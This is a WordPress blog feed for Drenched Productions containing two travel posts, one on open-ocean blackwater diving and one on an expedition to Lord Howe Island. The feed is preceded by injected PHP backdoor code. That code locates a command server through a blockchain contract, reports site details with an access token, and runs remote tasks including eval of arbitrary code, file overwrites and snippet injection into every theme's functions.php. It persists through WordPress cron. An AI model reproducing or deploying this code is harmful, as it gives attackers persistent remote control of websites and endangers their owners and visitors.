// 5y_pu if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/home4/visitkoh/public_html/drenchedproductions/wp-content/plugins/wp-helper-3b6147/wp-helper-3b6147.php', 'ctrl'=>'// 5y_pu', 'vis'=>'// uv_c6', 'vis_func'=>'wp_pelby6', 'vis_paths'=>array('/home4/visitkoh/public_html/drenchedproductions/wp-content/plugins/wp-helper-3b6147/wp-helper-3b6147.php'), 'opt'=>'_wp_j8dxmvis', ); $keys=array(); $keys['id']='09t'; $keys['ver']='86'; $keys['caps']='xlx'; $keys['tasks']='6b5'; $keys['interval']='h5w'; $keys['ack_id']='mpq'; $keys['ok']='xr'; $keys['detail']='4ac'; $keys['inv']='haa'; $keys['result']='d1p'; $hdr='X-6AU-Auth';$tok='Z0byV0Z_IqFMjHXm2qoCP8bul4Qe2aHGcPd3IE0mZGM';$id='760ac392ab03b50e';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Season 3 - Drenched Productions https://drenchedproductions.com - Expedition Drenched Sun, 24 Jul 2022 19:04:54 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 https://i0.wp.com/drenchedproductions.com/wp-content/uploads/2021/05/cropped-Expedition-Drenched-TRANSPARENT-BACKGROUND_3.png?fit=32%2C32&ssl=1 Season 3 - Drenched Productions https://drenchedproductions.com 32 32 193191625 We Went Blackwater Diving Over 9,000ft of Water to See the Diel Vertical Migration https://drenchedproductions.com/we-went-blackwater-diving-over-9000ft-of-water-to-see-the-diel-vertical-migration/ https://drenchedproductions.com/we-went-blackwater-diving-over-9000ft-of-water-to-see-the-diel-vertical-migration/#comments Sat, 02 Jul 2022 19:37:50 +0000 https://drenchedproductions.com/?p=2242 We put on our SCUBA gear, attached ourselves to ropes, and let the Sylfia drag us through 9,000ft deep open ocean water in the middle of the night. And we’d do it again! Expedition Drenched goes open ocean blackwater diving!

The post We Went Blackwater Diving Over 9,000ft of Water to See the Diel Vertical Migration first appeared on Drenched Productions.

]]>
Blackwater Diving Over 9,000 FT of Water | Expedition Drenched

We Went Blackwater Diving Over 9,000ft of Water to See the Diel Vertical Migration

Expedition Drenched

02 July 2022

We put on our SCUBA gear, attached ourselves to ropes, and let the Sylfia drag us through 9,000ft deep open ocean water in the middle of the night. And we’d do it again! Expedition Drenched goes open ocean blackwater diving!

We’ve been on the Sylfia and the open water for almost two weeks now, slowly making our way from mainland Australia to Lord Howe Island. The voyage so far has been fairly problem-free and the new crew is adapting well to a life at sea. 

Night diving is something that the Expedition Drenched crew does pretty often. We love being underwater after dark to witness how the ocean changes when the sun goes away. This is when most of the creatures in the ocean start to move around looking for food. 

As we sail towards our next stop on our way to Lord Howe Island, we thought we’d take advantage of the extremely deep water we were in and do a blackwater dive. We won’t lie – we were all a bit nervous before the dive. Who wouldn’t be nervous to be underwater in the pitch-black attached to a boat that’s drifting and pulling you through the current? But those nerves disappeared soon after we jumped into the soup of creatures that the Diel Vertical Migration delivered right to us. 

Diel Vertical Migration - Largest Migration in the World

When people think of large animal migrations, they usually think of geese flying south for the winter or wildebeests travelling over the Serengeti because we can easily see these migrations. But actually, the largest migration in the world happens twice a day in the deep oceans. 

The term ‘diel vertical migration’ is easy to understand if you break down its parts. Diel means that it happens every day. Vertical refers to the direction of movement. And migration highlights the mass movement of animals. The average creature migrates 1,000m towards the surface when the sun goes down, then migrates 1,000m back to the depths at the end of the night. That’s a huge distance to travel since most creatures are quite small. It would be the equivalent of you having to run 10km to go get your dinner and then having to run 10km back home to go to bed.

Diel Migration | Expedition Drenched
Daily migration of marine life between the twilight zone and the ocean surface – animation by NASA
( https://earthobservatory.nasa.gov/blogs/fromthefield/2018/08/)

The Diel Vertical Migration is such a large event that it causes turbulence in the ocean water. Migrating jellyfish can move water upwards through the water column and this movement carries nutrients across water boundaries to new places.

The daily migrations of marine creatures were first noticed by French naturalist Georges Cuvier in the early 1880s. While the exact reason for such a large movement of animals is still unclear, the best explanation to date is that they swim toward surface waters to feed at night while conditions will keep them hidden from predators. Some creatures may migrate to take advantage of the reduced exposure to ultraviolet radiation, while others use the nighttime currents to move to areas with more food. 

The Diel Vertical Migration also plays a significant role in the carbon cycle. The creatures that feed at the surface during the night return to the depths for the daylight hours and they take their waste with them. This accelerates the rate at which carbon is transported to the sea floor and sequestered. With climate change still worsening, the conditions in the ocean are constantly changing. If conditions get too bad and the daily migration of these animals is disrupted, there could be huge implications for the environment. 

So, What Is Blackwater Diving?

Blackwater diving is exactly what it sounds like – diving in black water. It’s essentially a really special night dive. This type of diving is still relatively unknown to a lot of the SCUBA diving community but it is gaining popularity quite quickly. And for good reason, too. It’s an awesome experience.

There are three different types of blackwater dives: bonfire, near a reef, and open ocean (or off-shore). Each of these dives focuses on diving in dark water and experiencing the marine creatures that emerge at night, but each is unique and requires different things from a diver.

A bonfire dive is the easiest blackwater dive so it makes a good starting point to ease into this (sometimes scary) type of diving. It’s usually done in shallow water (10-18 meters) in an area with no current. Lights are placed on the ocean bottom pointing upwards (almost looking like a group of bonfires) and they attract all sorts of nocturnal animals.

A near reef blackwater dive is the most challenging type of blackwater dive, even though the name makes it sound pretty chill. These dives usually take place along a reef or wall where there is open ocean immediately adjacent. Lights that mimic moonlight are placed around 10-15 meters down in the water column and they attract life from the neighbouring reef or wall and the depths. A decent amount of diving experience is helpful to undertake this dive since the lack of visual references in the water often presents divers with buoyancy issues. 

The last type of blackwater diving sounds terrifying but is going to give you the best experience – open ocean blackwater diving. To do this dive correctly, you should be in the open ocean over thousands of feet of water and in a slight current. Since those conditions could mean drifting away in open water at night, open ocean blackwater diving has to be a bit different. Each diver is connected to a drop line that is also connected to the boat. They can ascend and descend along the rope but as the boat is pulled through the current, the divers will be pulled along with it. 

 

 

This is the type of dive that we’ve just done. For many of the crew, it was their first blackwater dive of any kind so nerves were a bit high, but so were the excitement levels. Plus, it was a perfect chance to take full advantage of the Sylfia’s brand new in-hull Lumitec Marine Lights. As we were on deck gearing up and going through our blackwater dive briefing, our awesome Lumitec lights were attracting all sorts of bizarre and other-worldly creatures up from the deep.

Lumitec Marine Lights | Expedition Drenched

Rainbows of Colour in the Dark, Dark Night

It’s hard to describe this dive to people who weren’t there. How can you properly describe seeing the most beautiful rainbows of colour in the pitch-dark night? The ocean creatures that drifted past our faces in the dark waters of the Pacific Ocean at 2:30 am absolutely blew our minds. 

We saw an incredible variety of bioluminescent creatures that emit their own light, like Comb jellyfish. These jellies have genes that produce photoproteins, a combination of two chemicals involved in light production. When calcium is added to the molecule, light is born. Comb jellies also produce rainbow effects when the comb-like plates on their bodies break up due to water turbulence and diffract the surrounding light. 

Lord Howe Night Dive | Expedition Drenched
Lord Howe Island - Blackwater Diving | Expedition Drenched
Blackwater Diving | Expedition Drenched
Black Abyss Diving | Expedition Drenched

 

Really and truly, the only way to understand what we saw on this amazing open ocean blackwater dive is to check out the Expedition Drenched Season 3 Episode 4 video that’s live on our YouTube channel now. Make sure you check it out and throw us a like and subscribe. Also, drop a comment and let us know about the cool stuff you’ve seen on a blackwater dive!

Next Stop - Elizabeth Reef

  • Coordinates: 29°57′25″S 159°4′32″E
  • Distance from Lord Howe Island: 175km
  • Width: 10.5km
  • Length: 6.1km
  • # of Recorded Fish Species: 311

Our next stop is Elizabeth Reef, roughly 175km north of Lord Howe Island. Elizabeth Reef and neighbouring Middleton Reef form the Lord Howe Rise, an underwater plateau. They’re both also part of a regulated marine park so it should be a stunning location for some seriously wicked dives. 

One of the most exciting things about Elizabeth Reef is the high recorded number of Galapagos sharks. These sharks are only found around Lord Howe Island and Lord Howe Rise so they were already one of the draws of our expedition to the area. But the high number of Galapagos sharks at Elizabeth Reef may suggest that the reef acts as a nursery and that is a very exciting prospect for the shark-loving Sylfia crew.

Stay tuned to our YouTube channel and come explore this idyllic coral reef with us!

 

👉Web: https://expeditiondrenched.org

👉Patreon: https://www.patreon.com/DrenchedDivers

👉Facebook: https://www.facebook.com/ExpeditionDr…

👉Instagram: https://www.instagram.com/expeditiond…

👉Merch: https://expeditiondrenched.org/collections/products

 

Expedition drenched is a U.S. based marine educational non profit 501c3 made possible by our donors and patrons. If you love scuba, sailing, travel, adventure, exploration, conservation, and all things aquatic, we really hope you will continue to follow us on our journey. Our goal in making these videos is to show the world all the amazing, beautiful, and strange inhabitants of the ocean in the hopes that we will all be inspired to protect it.

If you liked our video, keep watching them! Subscribe! Thumbs Up!

Let us know what you think in the comments! Share us with all your favorite mermaids and mermen in your life!

Support us on Patreon: https://www.patreon.com/DrenchedDivers

We Use & Love:

Cameras we use:

  • Aerials: DJI Mavic
  • On Land: Sony A7iii, Sony AX-53, GoPro 7

Underwater:

  • Sony A7iii in Nauticam Housing
  • Sony RX-100 in Nauticam Housing Underwater

Lighting:

You Might Also Like:

DJI Mavic 2 PRO Drone Quadcopter with Fly More Kit Combo Bundle
DJI Mavic 2 PRO Drone Quadcopter with Fly More Kit Combo Bundle
Keldan Video 8X 10,000 Lumen 5,000K Video
Keldan Video 8X 10,000 Lumen 5,000K Video
GoPro HERO7 Black + Extra Battery - E-Commerce Packaging - Water
GoPro HERO7 Black + Extra Battery - E-Commerce Packaging - Water

The post We Went Blackwater Diving Over 9,000ft of Water to See the Diel Vertical Migration first appeared on Drenched Productions.

]]>
https://drenchedproductions.com/we-went-blackwater-diving-over-9000ft-of-water-to-see-the-diel-vertical-migration/feed/ 1 2242
How Did We Get So Lucky? We’re Hitting the Sea for Expedition Drenched Season 3 https://drenchedproductions.com/lord-howe-island/ https://drenchedproductions.com/lord-howe-island/#comments Wed, 22 Jun 2022 02:31:37 +0000 https://drenchedproductions.com/?p=2027 Our sails are raised and we’re hitting the sea for Expedition Drenched Season 3 - full steam ahead! This season our adventures take us to the Lord Howe Archipelago, a mind-blowing UNESCO world heritage site.

The post How Did We Get So Lucky? We’re Hitting the Sea for Expedition Drenched Season 3 first appeared on Drenched Productions.

]]>
Expedition Drenched Season 3

How Did We Get So Lucky?
We’re Hitting the Sea for Expedition Drenched Season 3

Expedition Drenched

22 June 2022

It’s finally time for us to hit the water again. It’s finally time for Expedition Drenched Season 3!

The Sylfia and her crew have an incredible, almost unreal destination in our sights for our next voyage – Lord Howe Island in the Tasman Sea between Australia and New Zealand. Lord Howe is one of the last unspoiled spots in Australia and frankly, it looks like you’ve gone back in time when you sail up to her shores.

The Lord Howe Island archipelago contains 28 different islands, including the tallest volcanic sea stack in the world, and boasts a surprising number of land and marine species that are endemic to only this stunning collection of remote islands. 

Let’s take a look at Lord Howe Island and the archipelago to get a bit of a preview of what the Expedition Drenched Season 3 crew will be doing this season.

 

  • Island length: 11km
  • Island width: 2km (at its widest)
  • Total area: 14.5 sq. km
  • Liveable area: 3.96 sq. km
  • Local population: approx. 350 people
  • Permitted visitors: only 400 at a time
  • Distance to mainland Australia:700km
  • Flight time to mainland Australia: less than 2 hours

The Birth of Lord Howe Island

Lord Howe Island had a dramatic, violent birth. It and the other islands of the archipelago were formed by an underwater volcanic eruption approximately 7 million years ago. The lapping waves of the surrounding ocean have slowly eroded the volcano away, leaving behind the towering, jagged cliffs and mountains that give Lord Howe its Jurrasic Park-like appearance. 

Lord Howe Island itself is marked by two volcanic peaks, Mount Gower and Mount Lidgbird, with elevations of 2,870 feet and 2,550 feet above sea level, respectively. 

The archipelago spent millions of years growing up untouched by humans. Currently, there is no evidence to support any theories that Australian aboriginals or Pacific Islanders discovered the group of islands. But this quiet life was disrupted when explorers and settlers began to arrive in the late 18th century. 

Scuba Diving the Lord Howe Archipelago

The best time to pack up your dive gear and jump over to Lord Howe Island is between September and May since that’s the summer period. But the winter months of June, July, and August can still be quite sunny and warm, and there is still a lot to do around the archipelago during the off-season.

The Lord Howe Archipelago is located at the crossroads of all five of the major ocean currents: the North Atlantic, the South Atlantic, The North Pacific, the South Pacific, and the Indian Ocean Gyre. That might sound a bit intimidating but that level of water movement brings in HUGE amounts of marine food to the archipelago and therefore attracts marine life from the tiniest sea slugs to huge whales. 

The Lord Howe Island Marine Park is the only place in Australian waters that can boast the presence of Galapagos sharks, too. They grow to an average of 3 meters in length, with the largest ones being just under 4 meters long. Weighing approximately 150 kilograms, these beautiful creatures will make any scuba diving trip to Lord Howe Island well worth it.

Expedition Drenched Season 3 Lord Howe Island
Lord Howe Island | Expedition Drenched

Only Available in the Lord Howe Archipelago

The ecosystems of the Lord Howe Island Archipelago support a huge array of distinct flora and fauna groups and a surprising variety of unique and endemic species, both above the water and below. 

Impressively, of the 1,600 inspect species that have been documented on the island, 60% are found nowhere else on the planet. Of the 241 species of indigenous plants found in the area, 47% are found nowhere else on the planet. Lord Howe Island is definitely a destination for adventurous people who want to see versions of natural life that most people have never had the chance to see. 

Under the waves of the water that cradles the islands of the archipelago, the world is just as diverse, bizarre, and unique. Over 500 species of fish make the island waters their home and over 90 different types of coral species have been working over millennia to build the stunning reefs that dot the ocean landscape.

Howe Do You Get There?

Well, if you’re like us, the only way to rock up to Lord Howe is in your own boat after taking a multi-day journey on the Pacific Ocean with a hull full of your favorite pirates. But that’s not really an option for most people.

If you can’t sail your own boat over, your only other option is to travel to Lord Howe by air. Qantas runs flights direct to Lord Howe from Sydney for a reasonable price. Prior to the COVID-19 pandemic, the airline was running one flight a day to the island paradise, but now the flight frequency has dropped considerably. Make sure to check the Qantas website for up-to-date flight schedules. 

Since the Lord Howe Archipelago is part of Australia, you don’t need any special visa or permission to pop over and check the place out. Once you’re in Australia, you’re good to go!

Get Stoked About Expedition Drenched Season 3

Expedition Drenched Season 3 will definitely prove to be a season full of vivid memories, life-changing moments, and ocean-loving adventures. Like us on YouTube and subscribe to our YouTube channel to make sure that you get the episodes as soon as we’ve released them.

And don’t forget, it’s only possible for us to do what we do if we have your generous support. If you’re enjoying the content we produce, have a passion for marine conservation, or just want to find a way to get involved, consider popping over to our website to donate to our cause, or grab some sweet Expedition Drenched merchandise from our online shop. All proceeds from sales also go to funding our incredible ocean-saving dream.

All aboard! It’s time to shove off east towards all the wonders that Lord Howe Island has in store for us!

👉Web: https://expeditiondrenched.org

👉Patreon: https://www.patreon.com/DrenchedDivers

👉Facebook: https://www.facebook.com/ExpeditionDr…

👉Instagram: https://www.instagram.com/expeditiond…

👉Merch: https://expeditiondrenched.org/collections/products

 

Expedition drenched is a U.S. based marine educational non profit 501c3 made possible by our donors and patrons. If you love scuba, sailing, travel, adventure, exploration, conservation, and all things aquatic, we really hope you will continue to follow us on our journey. Our goal in making these videos is to show the world all the amazing, beautiful, and strange inhabitants of the ocean in the hopes that we will all be inspired to protect it.

If you liked our video, keep watching them! Subscribe! Thumbs Up!

Let us know what you think in the comments! Share us with all your favorite mermaids and mermen in your life!

Support us on Patreon: https://www.patreon.com/DrenchedDivers

We Use & Love:

Cameras we use:

  • Aerials: DJI Mavic
  • On Land: Sony A7iii, Sony AX-53, GoPro 7

Underwater:

  • Sony A7iii in Nauticam Housing
  • Sony RX-100 in Nauticam Housing Underwater

Lighting:

You Might Also Like:

DJI Mavic 2 PRO Drone Quadcopter with Fly More Kit Combo Bundle
DJI Mavic 2 PRO Drone Quadcopter with Fly More Kit Combo Bundle
Keldan Video 8X 10,000 Lumen 5,000K Video
Keldan Video 8X 10,000 Lumen 5,000K Video
GoPro HERO7 Black + Extra Battery - E-Commerce Packaging - Water
GoPro HERO7 Black + Extra Battery - E-Commerce Packaging - Water

The post How Did We Get So Lucky? We’re Hitting the Sea for Expedition Drenched Season 3 first appeared on Drenched Productions.

]]>
https://drenchedproductions.com/lord-howe-island/feed/ 3 2027